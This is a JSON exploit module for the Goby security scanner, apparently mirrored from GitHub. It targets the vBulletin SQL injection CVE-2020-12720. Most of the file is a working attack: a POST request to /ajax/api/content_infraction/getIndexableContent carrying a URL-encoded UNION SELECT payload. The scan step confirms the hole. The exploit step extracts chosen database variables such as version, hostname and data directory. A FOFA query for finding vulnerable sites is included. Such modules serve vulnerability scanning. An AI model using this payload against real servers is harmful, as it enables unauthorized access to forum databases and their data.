mirror of https://github.com/qwqdanchun/Goby.git
95 lines
3.0 KiB
JSON
95 lines
3.0 KiB
JSON
{
|
|
"Name": "vBulletin SQLi (CVE-2020-12720)",
|
|
"Description": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.",
|
|
"Product": "vBulletin",
|
|
"Homepage": "https://www.vbulletin.com/",
|
|
"DisclosureDate": "2020-05-07",
|
|
"Author": "itardc@163.com",
|
|
"FofaQuery": "app=vBulletin",
|
|
"GobyQuery": "app=vBulletin",
|
|
"Level": "3",
|
|
"Impact": "",
|
|
"Recommendation": "",
|
|
"References": [
|
|
"http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html",
|
|
"http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html",
|
|
"https://attackerkb.com/topics/RSDAFLik92/cve-2020-12720-vbulletin-incorrect-access-control",
|
|
"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1",
|
|
"https://nvd.nist.gov/vuln/detail/CVE-2020-12720",
|
|
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12720"
|
|
],
|
|
"HasExp": true,
|
|
"ExpParams": [
|
|
{
|
|
"name": "SystemVar",
|
|
"type": "createSelect",
|
|
"value": "version,hostname,datadir,basedir",
|
|
"show": ""
|
|
}
|
|
],
|
|
"ExpTips": {
|
|
"Type": "",
|
|
"Content": ""
|
|
},
|
|
"ScanSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-",
|
|
"data_type": "text",
|
|
"follow_redirect": false,
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
"X-Requested-With": "XMLHttpRequest"
|
|
},
|
|
"method": "POST",
|
|
"uri": "/ajax/api/content_infraction/getIndexableContent"
|
|
},
|
|
"ResponseTest": {
|
|
"checks": [
|
|
{
|
|
"bz": "",
|
|
"operation": "contains",
|
|
"type": "item",
|
|
"value": "vbulletinrce",
|
|
"variable": "$body"
|
|
}
|
|
],
|
|
"operation": "AND",
|
|
"type": "group"
|
|
}
|
|
}
|
|
],
|
|
"ExploitSteps": [
|
|
"AND",
|
|
{
|
|
"Request": {
|
|
"data": "nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40{{{SystemVar}}}%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-",
|
|
"data_type": "text",
|
|
"follow_redirect": false,
|
|
"header": {
|
|
"Content-Type": "application/x-www-form-urlencoded",
|
|
"X-Requested-With": "XMLHttpRequest"
|
|
},
|
|
"method": "POST",
|
|
"uri": "/ajax/api/content_infraction/getIndexableContent"
|
|
},
|
|
"SetVariable": [
|
|
"output|lastbody|regex|vbulletinrce(.+?)\""
|
|
]
|
|
}
|
|
],
|
|
"Tags": ["sqli"],
|
|
"CVEIDs": [
|
|
"CVE-2020-12720"
|
|
],
|
|
"CVSSScore": "9.8",
|
|
"AttackSurfaces": {
|
|
"Application": ["vBulletin"],
|
|
"Support": null,
|
|
"Service": null,
|
|
"System": null,
|
|
"Hardware": null
|
|
},
|
|
"Disable": false
|
|
} |